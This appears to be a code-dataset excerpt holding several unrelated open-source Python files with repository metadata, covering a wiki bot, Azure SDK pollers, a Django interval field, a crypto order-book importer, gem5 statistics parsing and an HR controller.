gravity_firstmoon = (firstmoon.mass / planet.mass) * firstmoon.px
gravity_secondmoon = (secondmoon.mass / planet.mass) * secondmoon.px
gravity_thirdmoon = (thirdmoon.mass / planet.mass) * thirdmoon.px
gravity_fourthmoon = (fourthmoon.mass / planet.mass) * fourthmoon.px
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon + gravity_thirdmoon + gravity_fourthmoon)
# Use the outermost moon to calculate the length of one full orbit duration
orbit_duration = math.sqrt((4 * math.pi**2 *fourthmoon.px ** 3) / (G * (fourthmoon.mass + planet.mass)))
orbit_duration = orbit_duration * 1.002
# Run simulation. Make sure to add/remove the moons you want to simulate!
ttv_array, tdv_array = run_sim(
R_star,
transit_duration,
[planet, firstmoon, secondmoon, thirdmoon, fourthmoon])
# Output information
print 'TTV amplitude =', numpy.amax(ttv_array), \
'[min] = ', numpy.amax(ttv_array) * 60, '[sec]'
print 'TDV amplitude =', numpy.amax(tdv_array), \
'[min] = ', numpy.amax(tdv_array) * 60, '[sec]'
ax = plt.axes()
plt.plot(ttv_array, tdv_array, color = 'k')
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
plt.rc('text', usetex=True)
plt.tick_params(axis='both', which='major', labelsize = 16)
plt.xlabel('transit timing variation [minutes]', fontsize = 16)
plt.ylabel('transit duration variation [minutes]', fontsize = 16)
ax.tick_params(direction='out')
plt.ylim([numpy.amin(tdv_array) * 1.2, numpy.amax(tdv_array) * 1.2])
plt.xlim([numpy.amin(ttv_array) * 1.2, numpy.amax(ttv_array) * 1.2])
plt.plot((0, 0), (numpy.amax(tdv_array) * 10., numpy.amin(tdv_array) * 10.), 'k', linewidth=0.5)
plt.plot((numpy.amin(ttv_array) * 10., numpy.amax(ttv_array) * 10.), (0, 0), 'k', linewidth=0.5)
# Fix axes for comparison with eccentric moon
plt.xlim(-0.11, +0.11)
plt.ylim(-0.8, +0.8)
plt.annotate(r"5:4:3:1", xy=(-0.105, +0.7), size=16)
plt.savefig("fig_system_20.eps", bbox_inches = 'tight')
|
mit
| -120,625,737,298,135,980
| 34.539171
| 185
| 0.638485
| false
| 2.944635
| false
| false
| false
|
alemela/alessiobot
|
script/add_immagine_orfana.py
|
1
|
2591
|
# -*- coding: utf-8 -*-
import pywikibot, re, subprocess
from pywikibot import pagegenerators
import time, sys
start = time.clock()
args = pywikibot.handleArgs()
site = pywikibot.Site('it', 'wikipedia')
today = time.strftime("%Y%m%d")
if sys.argv[1] == "immagini_orfane_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_libere/'+today+'.txt'
template = u'{{Immagine orfana|libera}}'
comment = u'Bot: immagine orfana con licenza libera'
elif sys.argv[1] == "immagini_orfane_non_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_non_libere/'+today+'.txt'
template = u'{{Immagine orfana|non libera}}'
comment = u'Bot: immagine orfana con licenza non libera'
elif sys.argv[1] == "immagini_orfane_pd_italia":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_pd_italia/'+today+'.txt'
template = u'{{Immagine orfana|PD-Italia}}'
comment = u'Bot: immagine orfana con licenza PD italia'
elif sys.argv[1] == "immagini_orfane_sconosciute":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_sconosciute/'+today+'.txt'
template = u'{{Immagine orfana}}'
comment = u'Bot: immagine orfana con licenza sconosciuta'
else:
print "Unvalid type of licence"
exit()
has_template = r'\{\{(?:template:|)(immagine_orfana)[\|\}]'
def main():
add_lists = pagegenerators.TextfilePageGenerator(path)
for page in add_lists:
# Check if the page exists or if there's already the template
try:
oldtxt = page.get()
except pywikibot.NoPage:
pywikibot.output(u"%s doesn't exist! Skip" % page.title())
continue
except pywikibot.IsRedirectPage:
pywikibot.output(u"%s is redirect, skip" % page.title(asLink=True))
            continue
check_notice = re.findall(has_template, oldtxt.lower())
if check_notice != []:
            pywikibot.output(u'Template already in %s, skip' % page.title())
continue
        # Ok, the page needs the template. Let's put it there!
newtxt = u"%s\n%s" % (template, oldtxt)
try:
page.put(newtxt, comment)
pywikibot.output(u"\t\t>>> %s <<<" % page.title())
# pywikibot.output(u"editing!!!")
except pywikibot.LockedPage:
pywikibot.output(u'%s is a locked page! Skip' %page.title())
continue
except pywikibot.EditConflict:
pywikibot.output(u'Edit Conflict! Skip')
continue
if __name__ == "__main__":
try:
main()
finally:
pywikibot.stopme()
end=time.clock()
print "Run time: ", end-start
|
mit
| 921,331,364,314,386,600
| 34.013514
| 100
| 0.657661
| false
| 2.988466
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/aio/_lro_async.py
|
1
|
11430
|
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import datetime
from typing import Optional
from azure.core.exceptions import HttpResponseError
from azure.core.polling import AsyncLROPoller
from azure.core.polling.base_polling import OperationFailed, BadStatus
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.polling._async_poller import PollingReturnType
_FINISHED = frozenset(["succeeded", "cancelled", "failed", "partiallycompleted"])
_FAILED = frozenset(["failed"])
_SUCCEEDED = frozenset(["succeeded", "partiallycompleted"])
class TextAnalyticsAsyncLROPollingMethod(AsyncLROBasePolling):
def finished(self):
"""Is this polling finished?
:rtype: bool
"""
return TextAnalyticsAsyncLROPollingMethod._finished(self.status())
@staticmethod
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
@staticmethod
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
@staticmethod
def _raise_if_bad_http_status_and_method(response):
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
async def _poll(self): # pylint:disable=invalid-overridden-method
"""Poll status of operation so long as operation is incomplete and
we have an endpoint to query.
:param callable update_cmd: The function to call to retrieve the
latest status of the long running operation.
:raises: OperationFailed if operation status 'Failed' or 'Canceled'.
:raises: BadStatus if response status invalid.
:raises: BadResponse if response invalid.
"""
while not self.finished():
await self._delay()
await self.update_status()
if TextAnalyticsAsyncLROPollingMethod._failed(self.status()):
raise OperationFailed("Operation failed or canceled")
final_get_url = self._operation.get_final_get_url(self._pipeline_response)
if final_get_url:
self._pipeline_response = await self.request_status(final_get_url)
TextAnalyticsAsyncLROPollingMethod._raise_if_bad_http_status_and_method(
self._pipeline_response.http_response
)
class AsyncAnalyzeHealthcareEntitiesLROPollingMethod(
TextAnalyticsAsyncLROPollingMethod
):
def __init__(self, *args, **kwargs):
self._text_analytics_client = kwargs.pop("text_analytics_client")
super(AsyncAnalyzeHealthcareEntitiesLROPollingMethod, self).__init__(
*args, **kwargs
)
@property
def _current_body(self):
from .._generated.v3_1.models import JobMetadata
return JobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeHealthcareEntitiesLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeHealthcareEntitiesLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your healthcare entities job was created
:return: When your healthcare entities job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def expires_on(self) -> datetime.datetime:
"""When your healthcare entities job will expire
:return: When your healthcare entities job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def last_modified_on(self) -> datetime.datetime:
"""When your healthcare entities job was last modified
:return: When your healthcare entities job was last modified
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def id(self) -> str:
"""ID of your call to :func:`begin_analyze_healthcare_entities`
:return: ID of your call to :func:`begin_analyze_healthcare_entities`
:rtype: str
"""
return self.polling_method().id
async def cancel( # type: ignore
self, **kwargs
) -> "AsyncLROPoller[None]":
"""Cancel the operation currently being polled.
:keyword int polling_interval: The polling interval to use to poll the cancellation status.
The default value is 5 seconds.
:return: Returns an instance of an AsyncLROPoller that returns None.
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError: When the operation has already reached a terminal state.
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_analyze_healthcare_entities_with_cancellation_async.py
:start-after: [START analyze_healthcare_entities_with_cancellation_async]
:end-before: [END analyze_healthcare_entities_with_cancellation_async]
:language: python
:dedent: 4
:caption: Cancel an existing health operation.
"""
polling_interval = kwargs.pop("polling_interval", 5)
await self.polling_method().update_status()
try:
return await getattr(
self._polling_method, "_text_analytics_client"
).begin_cancel_health_job(
self.id,
polling=TextAnalyticsAsyncLROPollingMethod(timeout=polling_interval),
)
except HttpResponseError as error:
from .._response_handlers import process_http_response_error
process_http_response_error(error)
class AsyncAnalyzeActionsLROPollingMethod(TextAnalyticsAsyncLROPollingMethod):
@property
def _current_body(self):
from .._generated.v3_1.models import AnalyzeJobMetadata
return AnalyzeJobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def display_name(self):
if not self._current_body:
return None
return self._current_body.display_name
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def actions_failed_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["failed"]
@property
def actions_in_progress_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["inProgress"]
@property
def actions_succeeded_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["completed"]
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def total_actions_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["total"]
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeActionsLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeActionsLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your analyze job was created
:return: When your analyze job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def display_name(self) -> Optional[str]:
"""The display name of your :func:`begin_analyze_actions` call.
Corresponds to the `display_name` kwarg you pass to your
:func:`begin_analyze_actions` call.
:return: The display name of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().display_name
@property
def expires_on(self) -> datetime.datetime:
"""When your analyze job will expire
:return: When your analyze job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def actions_failed_count(self) -> int:
"""Total number of actions that have failed
:return: Total number of actions that have failed
:rtype: int
"""
return self.polling_method().actions_failed_count
@property
def actions_in_progress_count(self) -> int:
"""Total number of actions currently in progress
:return: Total number of actions currently in progress
:rtype: int
"""
return self.polling_method().actions_in_progress_count
@property
def actions_succeeded_count(self) -> int:
"""Total number of actions that succeeded
:return: Total number of actions that succeeded
:rtype: int
"""
return self.polling_method().actions_succeeded_count
@property
def last_modified_on(self) -> datetime.datetime:
"""The last time your actions results were updated
:return: The last time your actions results were updated
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def total_actions_count(self) -> int:
"""Total number of actions you submitted
:return: Total number of actions submitted
:rtype: int
"""
return self.polling_method().total_actions_count
@property
def id(self) -> str:
"""ID of your :func:`begin_analyze_actions` call.
:return: ID of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().id
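# Illustrative use of the poller metadata (a sketch only; `client` is assumed
# to be an azure.ai.textanalytics.aio.TextAnalyticsClient created elsewhere):
#   poller = await client.begin_analyze_actions(documents, actions)
#   print(poller.total_actions_count, poller.actions_succeeded_count)
#   results = await poller.result()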
|
mit
| -4,780,159,262,981,646,000
| 31.844828
| 118
| 0.636308
| false
| 4.404624
| false
| false
| false
|
dbservice/dbservice
|
dbservice/apps/utils/fields.py
|
1
|
5914
|
import re
from dateutil.relativedelta import relativedelta
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import ugettext_lazy as _
import psycopg2.extensions
def _parse_opt_num(s):
if not s:
# For the ISO 8601 duration specifications, fields need not be
# explicitly included if their value is zero --- None from regexp
# should become 0.
return 0
try:
# Prefer integers. Only last specified field is allowed to contain a
# fractional part, though we don't explicitly check this.
# TODO: Check; is this still necessary/relevant/preferable to using
# float() for all fields?
return int(s)
except ValueError:
return float(s.replace(',', '.'))
# PnW
ISO_WEEK_RX = re.compile(
r'^P(\d+(?:[.,]\d*)?)W$')
# P[nY][nM][nD][T[nH][nM][nS]]
ISO_RX = re.compile(
r'^P'
r'(?:(\d+(?:[.,]\d*)?)Y)?' # year
r'(?:(\d+(?:[.,]\d*)?)M)?' # month
r'(?:(\d+(?:[.,]\d*)?)D)?' # day
r'(?:T' # start optional time part
r'(?:(\d+(?:[.,]\d*)?)H)?' # hour
r'(?:(\d+(?:[.,]\d*)?)M)?' # minute
r'(?:(\d+(?:[.,]\d*)?)S)?' # second
r')?' # end optional time part
r'$')
def _iso8601_to_relativedelta(s):
"""
Parse a duration specification in the accepted ISO 8601 formats
'PnYnMnDTnHnMnS' or 'PnW' to a ``relativedelta`` object.
"""
match = ISO_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = \
[_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
match = ISO_WEEK_RX.match(s)
if match:
weeks = _parse_opt_num(match.groups()[0])
return relativedelta(weeks=weeks)
raise ValueError('Invalid ISO 8601 duration string %s' % s)
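# Example conversions (illustrative; the values follow directly from the
# regular expressions above):
#   _iso8601_to_relativedelta('P1Y2M3DT4H5M6S')
#       -> relativedelta(years=+1, months=+2, days=+3, hours=+4, minutes=+5, seconds=+6)
#   _iso8601_to_relativedelta('P2W')
#       -> relativedelta(days=+14)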
def _relativedelta_to_iso8601(val):
"""
Construct an ISO 8601 duration specification string from the provided
``relativedelta`` object.
"""
if val.leapdays:
raise ValueError('"leapdays" not representable')
if any([getattr(val, f) is not None for f in (
'year', 'month', 'day', 'weekday',
'hour', 'minute', 'second', 'microsecond')]):
raise ValueError(
            'relativedelta {} represents an absolute timestamp; '
'not a duration'.format(val))
seconds = val.seconds
if val.microseconds:
seconds += val.microseconds / 1000000.0
return 'P{years}Y{months}M{days}DT{hours}H{minutes}M{seconds}S'.format(
years=val.years, months=val.months, days=val.days,
hours=val.hours, minutes=val.minutes, seconds=seconds)
# [Y year[s]] [M mon[s]] [D day[s]] [HH:MM:SS[.s*]
POSTGRES_RX = re.compile(
r'^'
r'(?:(\d+) years? ?)?'
r'(?:(\d+) mons? ?)?'
r'(?:(\d+) days? ?)?'
r'(?:' # start optional time part
r'(\d+):(\d+):(\d+(?:\.\d*)?)'
r')?' # end optional time part
r'$')
def _postgres_to_relativedelta(s):
"""
Parse interval output in the default "postgres" style for PostgreSQL into a
``relativedelta``.
"""
match = POSTGRES_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = [
_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
raise ValueError('Unrecognized postgres interval string \'%s\'' % s)
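# Example (illustrative): the default "postgres" style interval output
# '1 year 2 mons 3 days 04:05:06' parses to
# relativedelta(years=+1, months=+2, days=+3, hours=+4, minutes=+5, seconds=+6).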
# Set "output" type for INTERVALs from the DB to be relativedelta.
INTERVAL2RELATIVEDELTA = psycopg2.extensions.new_type(
psycopg2.extensions.INTERVAL.values,
'INTERVAL2RELATIVEDELTA',
lambda value, curs:
_postgres_to_relativedelta(value) if value is not None else None)
psycopg2.extensions.register_type(INTERVAL2RELATIVEDELTA)
# Set conversion of relativedelta on "input" to the DB to be an appropriate ISO
# 8601 duration string.
def _adapt_relativedelta(val):
return psycopg2.extensions.AsIs("'{}'".format(
_relativedelta_to_iso8601(val)))
psycopg2.extensions.register_adapter(relativedelta, _adapt_relativedelta)
class IntervalField(models.Field):
description = 'A time interval'
__metaclass__ = models.SubfieldBase
default_error_messages = {
'invalid': _("'%s' value has an invalid format. It must be in "
"ISO 8601 duration (PnYnMnDTnHnMnS or PnW) format."),
}
def db_type(self, connection):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return 'interval'
def to_python(self, value):
if isinstance(value, relativedelta):
return value
if value is None or value == '':
return None
try:
return _iso8601_to_relativedelta(value)
except ValueError:
# any parse error becomes the same "invalid" error...
msg = self.error_messages['invalid'] % value
raise ValidationError(msg)
def get_db_prep_value(self, value, connection, prepared=False):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return super().get_db_prep_value(
value, connection, prepared)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return ''
else:
return _relativedelta_to_iso8601(value)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules(
[],
[r'^dbservice\.apps\.utils\.fields\.IntervalField'])
except ImportError:
pass
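# Example usage in a model definition (illustrative; the model and field names
# below are hypothetical and not part of this app):
#   class Meter(models.Model):
#       sampling_interval = IntervalField(null=True, blank=True)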
|
mit
| 987,401,872,882,005,600
| 32.412429
| 79
| 0.609063
| false
| 3.687032
| false
| false
| false
|
rnicoll/cryptocurrency-market-data
|
old/load_data_vtc.py
|
1
|
3580
|
#!/usr/bin/python3.2
import pymongo
from datetime import datetime
import json
from os import listdir, remove
from os.path import isdir, isfile, join
from pymongo import MongoClient
import pprint
class ExchangeError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def importCryptsy(bid_currency, quote_currency, book_data, content, file_time):
if (content['success'] != 1):
raise ExchangeError('Unsuccessful response from Cryptsy')
if (not isinstance(content['return'], dict)):
raise ExchangeError('No object in response from Cryptsy')
market_data = content['return'][bid_currency]
asks = []
bids = []
if (isinstance(market_data['sellorders'], list)):
for order in market_data['sellorders']:
asks.append([order['price'], order['quantity']])
if (isinstance(market_data['buyorders'], list)):
for order in market_data['buyorders']:
bids.append([order['price'], order['quantity']])
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Cryptsy",
"time": file_time,
"asks": asks,
"bids": bids}
book_data.insert(book)
def importVircurex(bid_currency, quote_currency, book_data, content, file_time):
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Vircurex",
"time": file_time,
"asks": content["asks"],
"bids": content["bids"]}
book_data.insert(book)
client = MongoClient()
market_data_db = client.market_data
imported_files = market_data_db.imported_files
book_data = market_data_db.book
base_dir = "/home/jrn/cryptocurrency_data/vtc_book_data"
pp = pprint.PrettyPrinter(indent=4)
for hour in [ d for d in listdir(base_dir) if isdir(join(base_dir, d)) ]:
hour_dir = join(base_dir, hour)
for exchange in [ d for d in listdir(hour_dir) if isdir(join(hour_dir, d)) ]:
exchange_dir = join(hour_dir, exchange)
for data_file in [ f for f in listdir(exchange_dir) if isfile(join(exchange_dir, f)) ]:
file_path = join(exchange_dir, data_file)
file_time = datetime.strptime(data_file, "%Y-%m-%dT%H:%M+0000.json")
existing_file = imported_files.find_one({"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file})
if (existing_file):
print("File " + file_path + " already imported.")
continue
imported_file = {"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file}
try:
with open(file_path, 'r') as f:
content = json.load(f)
except ValueError:
print ("File " + file_path + " contains is not valid JSON.")
remove(file_path)
continue
try:
object_id = imported_files.insert(imported_file)
if (exchange == "Cryptsy"):
importCryptsy("VTC", "BTC", book_data, content, file_time)
elif (exchange == "Vircurex"):
importVircurex("VTC", "BTC", book_data, content, file_time)
except KeyError as e:
print ("File " + file_path + " is invalid, missing key: " + str(e))
continue
except ExchangeError:
print ("File " + file_path + " is not a valid dataset.")
continue
|
mit
| -6,724,503,697,391,267,000
| 33.095238
| 95
| 0.575419
| false
| 3.764458
| false
| false
| false
|
hknyldz/pisitools
|
pisilinux/pisilinux/db/sourcedb.py
|
1
|
4805
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 - 2011, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import re
import gzip
import piksemel
import pisilinux
import pisilinux.specfile
import pisilinux.db.lazydb as lazydb
class SourceDB(lazydb.LazyDB):
def __init__(self):
lazydb.LazyDB.__init__(self, cacheable=True)
def init(self):
self.__source_nodes = {}
self.__pkgstosrc = {}
self.__revdeps = {}
repodb = pisilinux.db.repodb.RepoDB()
for repo in repodb.list_repos():
doc = repodb.get_repo_doc(repo)
self.__source_nodes[repo], self.__pkgstosrc[repo] = self.__generate_sources(doc)
self.__revdeps[repo] = self.__generate_revdeps(doc)
self.sdb = pisilinux.db.itembyrepo.ItemByRepo(self.__source_nodes, compressed=True)
self.psdb = pisilinux.db.itembyrepo.ItemByRepo(self.__pkgstosrc)
self.rvdb = pisilinux.db.itembyrepo.ItemByRepo(self.__revdeps)
def __generate_sources(self, doc):
sources = {}
pkgstosrc = {}
for spec in doc.tags("SpecFile"):
src_name = spec.getTag("Source").getTagData("Name")
sources[src_name] = gzip.zlib.compress(spec.toString())
for package in spec.tags("Package"):
pkgstosrc[package.getTagData("Name")] = src_name
return sources, pkgstosrc
def __generate_revdeps(self, doc):
revdeps = {}
for spec in doc.tags("SpecFile"):
name = spec.getTag("Source").getTagData("Name")
deps = spec.getTag("Source").getTag("BuildDependencies")
if deps:
for dep in deps.tags("Dependency"):
revdeps.setdefault(dep.firstChild().data(), set()).add((name, dep.toString()))
return revdeps
def list_sources(self, repo=None):
return self.sdb.get_item_keys(repo)
def which_repo(self, name):
return self.sdb.which_repo(self.pkgtosrc(name))
def which_source_repo(self, name):
source = self.pkgtosrc(name)
return source, self.sdb.which_repo(source)
def has_spec(self, name, repo=None):
return self.sdb.has_item(name, repo)
def get_spec(self, name, repo=None):
spec, repo = self.get_spec_repo(name, repo)
return spec
def search_spec(self, terms, lang=None, repo=None, fields=None, cs=False):
"""
        fields (dict) : looks for terms in the fields which are marked as True
        If fields is None, this method will search in all fields
        example :
        if fields is equal to : {'name': True, 'summary': True, 'desc': False}
        this method will return only packages that contain the terms in the
        package name or summary
"""
resum = '<Summary xml:lang=.(%s|en).>.*?%s.*?</Summary>'
redesc = '<Description xml:lang=.(%s|en).>.*?%s.*?</Description>'
if not fields:
fields = {'name': True, 'summary': True, 'desc': True}
if not lang:
lang = pisilinux.pxml.autoxml.LocalText.get_lang()
found = []
for name, xml in self.sdb.get_items_iter(repo):
if terms == [term for term in terms if (fields['name'] and \
re.compile(term, re.I).search(name)) or \
(fields['summary'] and \
re.compile(resum % (lang, term), 0 if cs else re.I).search(xml)) or \
(fields['desc'] and \
re.compile(redesc % (lang, term), 0 if cs else re.I).search(xml))]:
found.append(name)
return found
def get_spec_repo(self, name, repo=None):
src, repo = self.sdb.get_item_repo(name, repo)
spec = pisilinux.specfile.SpecFile()
spec.parse(src)
return spec, repo
def pkgtosrc(self, name, repo=None):
return self.psdb.get_item(name, repo)
def get_rev_deps(self, name, repo=None):
try:
rvdb = self.rvdb.get_item(name, repo)
except Exception: #FIXME: what exception could we catch here, replace with that.
return []
rev_deps = []
for pkg, dep in rvdb:
node = piksemel.parseString(dep)
dependency = pisilinux.dependency.Dependency()
dependency.package = node.firstChild().data()
if node.attributes():
attr = node.attributes()[0]
dependency.__dict__[attr] = node.getAttribute(attr)
rev_deps.append((pkg, dependency))
return rev_deps
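# Illustrative use, assuming at least one pisilinux repository is configured
# (a sketch; not part of the original module):
#   sourcedb = SourceDB()
#   for name in sourcedb.list_sources():
#       spec, repo = sourcedb.get_spec_repo(name)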
|
gpl-3.0
| -6,640,202,832,901,699,000
| 35.12782
| 98
| 0.589802
| false
| 3.696154
| false
| false
| false
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
1
|
2915
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
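# Usage (inferred from the argument handling above):
#   ./cachecmp.py stats.txt
# writes the per-thread hit comparison to stats-cachecmp.txt.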
|
mit
| 374,115,436,903,597,250
| 37.866667
| 90
| 0.651115
| false
| 3.091198
| false
| false
| false
|
ScottBuchanan/eden
|
controllers/hrm.py
|
1
|
25684
|
# -*- coding: utf-8 -*-
"""
Human Resource Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# =============================================================================
def index():
""" Module Home Page """
mode = session.s3.hrm.mode
if mode is not None:
# Go to Personal Profile
s3_redirect_default(URL(f="person"))
else:
# Bypass home page & go direct to searchable list of Staff
s3_redirect_default(URL(f="staff", args="summary"))
# =============================================================================
# People
# =============================================================================
def human_resource():
"""
HR Controller
- combined Staff/Volunteers
Used for Summary view, Imports and S3AddPersonWidget2
"""
return s3db.hrm_human_resource_controller()
# -----------------------------------------------------------------------------
def staff():
""" Staff Controller """
# Staff only
s3.filter = FS("type") == 1
def prep(r):
table = r.table
tablename = r.tablename
get_vars = r.get_vars
# Use CRUD strings for staff
crud_strings = s3.crud_strings
crud_strings[tablename] = crud_strings["hrm_staff"]
resource = r.resource
if "expiring" in get_vars:
# Filter for staff with contracts expiring in the next 4 weeks
query = FS("end_date") < \
(request.utcnow + datetime.timedelta(weeks=4))
resource.add_filter(query)
# Adapt CRUD strings
crud_strings[tablename].title_list = \
T("Staff with Contracts Expiring in the next Month")
# Reconfigure
resource.configure(# Sort by Expiry
sortby = table.end_date,
# Remove the Add button
insertable=False
)
# Adapt list_fields
list_fields = [(T("Contract End Date"), "end_date"),
"person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
]
else:
# Adapt list_fields
list_fields = ["person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
(T("Email"), "email.value"),
(settings.get_ui_label_mobile_phone(), "phone.value"),
]
if settings.get_hrm_use_trainings():
list_fields.append("person_id$training.course_id")
if settings.get_hrm_use_certificates():
list_fields.append("person_id$certification.certificate_id")
list_fields.append((T("Contract End Date"), "end_date"))
list_fields.append("status")
resource.configure(list_fields = list_fields)
if r.interactive:
if r.id:
if r.method not in ("profile", "delete"):
# Redirect to person controller
vars = {
"human_resource.id": r.id,
"group": "staff"
}
args = []
if r.representation == "iframe":
vars["format"] = "iframe"
args = [r.method]
redirect(URL(f="person", vars=vars, args=args))
else:
if r.method == "import":
# Redirect to person controller
redirect(URL(f="person",
args="import",
vars={"group": "staff"}))
elif not r.component and r.method != "delete":
# Configure site_id
field = table.site_id
site_id = get_vars.get("site_id", None)
if site_id:
field.default = site_id
field.writable = False
